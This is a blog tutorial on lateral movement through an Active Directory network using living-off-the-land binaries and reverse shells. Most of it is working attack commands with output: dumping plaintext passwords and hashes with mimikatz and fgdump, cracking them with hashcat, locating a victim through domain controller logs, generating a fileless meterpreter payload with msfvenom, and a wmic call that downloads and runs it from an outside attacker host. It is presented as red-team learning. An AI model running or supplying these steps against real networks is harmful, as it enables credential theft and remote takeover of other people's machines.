Lateral movement in Active Directory Network with LOLBAS

Hi everyone! Today’s post is on the basics of lateral movement in the Active Directory (AD) network. In this article, we will be focusing on using LOLBAS and reverse shells to compromise other computers in the internal network. Let’s get started!

Network

Below shows the network we will be using for our example.

Assumption

  • We have compromised the webserver (GNU/Linux).
  • We have compromised the Domain Controller(DC).
    • This means pivoting has already been done well.
      • Via Metasploit’s autoroute (If you have a meterpreter shell on the webserver).
      • Via Sshuttle (If webserver has Python in it for it to work).
  • UserA and UserB workstations are Windows machines.
  • UserA and UserB do not have RDP service enabled.
  • UserA and UserB can access outside the network for daily tasks like surfing the network, SSH to other computers, etc.

Goal

  • Obtaining plaintext passwords.
  • Compromising other Windows workstations (UserA and UserB).
    • Obtaining reverse shells on them.

Obtaining Domain Admin’s credential

To obtain Domain Admin’s credential, we will have to obtain it via the Domain Controller (DC).

Via meterpreter

Let’s say you have a meterpreter shell on the DC, we can load mimikatz in the memory and obtain the plaintext password or the NTLM hash. Mimikatz will search in the memory for the NTLM hash and plaintext password.

meterpreter> load kiwi
meterpreter> kiwi_cmd 'sekurlsa::logonpasswords'
...
Authentication ID : 0; 290000 (00000000:00012345)
Session           : Interactive from 1
User name         : owner
Domain            : MEME
Logon Server      : WIN-C0123456789
Logon Time        : 27/11/2021 00:00:00 AM
SID               : S-1-5-21-0123456789-0123456789-0123456789-123
      msv : 
       [00000005] Primary
       * Username : owner
       * Domain   : MEME
       * LM       : 3FA389CC77997D32B79AE2610DD89D4C
       * NTLM     : 506A1916A5F459398CD31EF2F9EDB616
       * SHA1     : 3a8abc1b6f49fbdfc76bdaf9a8e5e0f775a67a81
      tspkg :
       * Username : owner
       * Domain   : MEME
       * Password : tomjerry
      wdigest :
       * Username : owner
       * Domain   : MEME
       * Password : tomjerry
      kerberos :
       * Username : owner
       * Domain   : MEME
       * Password : tomjerry

Alternatively, if you only have a simple reverse shell, you can transfer mimikatz.exe from your Kali/Parrot or any machine you are using to the DC and run it.

Via fgdump (Usually used for simple reverse shell)

You can download fgdump here. In the reverse shell:

C:\Windows\Temp> fgdump.exe
owner:500:NO PASSWORD*********************:506A1916A5F459398CD31EF2F9EDB616:::

Copy the hash and crack it using Hashmap on your Windows host (include “-O” flag to run with GPU) or on your attacking machine.

kali@kali$ hashcat -m 1300 hash.txt wordlists.txt

Compromising UserA workstation

Let’s say we want to compromise UserA but we don’t know his/her IP address. We can port scan and ping sweep a whole list of machines in the network. We will know the list of IP addresses we can attack. However, we would not know which is UserA. Therefore, we can query Domain Controller’s event logs. Note that this way of finding out is only possible in an Active Directory network. Of course, if you don’t need to bother with what are the workstations and just compromise them, you can use Metasploit’s Auxiliary portscan module via Autorun pivoting or nmap via Sshuttle pivoting.

Finding the IP address of UserA

Firstly, we will need the SID of UserA. In CMD:

C:\Windows\System32> wmic useraccount get name,sid
UserA   S-1-5-21-9988776655-4433221100-0011223344-321
UserB   S-1-5-21-0011223344-5566778899-0011223344-321
owner   S-1-5-21-0123456789-0123456789-0123456789-123

You will need a PowerShell reverse shell. Therefore, the shell you generated must be a reverse PowerShell or you can spawn a PowerShell from the meterpreter shell.

meterpreter> load powershell
meterpreter> powershell_shell
PS>

Once you have a PowerShell on the Domain Controller, input the following:

PS> Get-WinEvent -FilterHashtable @{LogName='Security';Data='S-1-5-21-9988776655-4433221100-0011223344-321'} | Where-Object {$_.id -eq “4624”} | Select-Object -First 1 | Select -ExpandProperty Message
...
Network Information:
        Workstation Name:       DESKTOP-1234567
        Source Network Address: 192.168.1.2
        Source Port:            54321

Generate a shell and setup listener

Generate a reverse shell. In this example, I will be using the fileless way to be more stealthy so that there will not be any physical files on the disk. Besides that, I will be using the meterpreter shell. You can generate other forms of payload. I would less recommend bind shell as you might need to enable the inbound firewall rule on UserA’s computer to bind to that specified port.

kali@kali$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=22.22.11.11 LPORT=443 -f psh-reflection -o hehe.ps1

Setup HTTP service on your attacking machine (do this if you are doing the fileless way too):

kali@kali$ sudo python3 -m http.server 443

Setup a reverse meterpreter shell listener on metasploit (launched with sudo) in the background. Use Netcat if you are using a normal reverse shell.

msf> handler -p windows/x64/meterpreter_reverse_tcp -H 22.22.11.11 -P 443

Obtain a shell on UserA

In the Domain Controller (DC)’s shell, use PowerShell IEX to download and run the PowerScript using wmic. You can also use the LOLBAS wmic to do other things like run your file, use certutil to download files, modify firewall rules, etc.

C:\Windows\System32> wmic /node:"192.168.1.2" /USER:"MEME\owner" /PASSWORD:"tomjerry" PROCESS call create "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://22.22.11.11/hehe.ps1')"

You should see your HTTP service shows a request for hehe.ps1 before you obtain a reverse shell on UserA’s computer! You can repeat the same steps for UserB as well.

Conclusion

There are many other ways for lateral movements such as using of PSExec but they are much noisier as they will appear in Windows event logs. However, lateral movements have to depend on the group policies/configurations as well. There is a good list of cheatsheets by Cas which will be useful if you are doing red teaming or for OSEP.

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Images credits

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.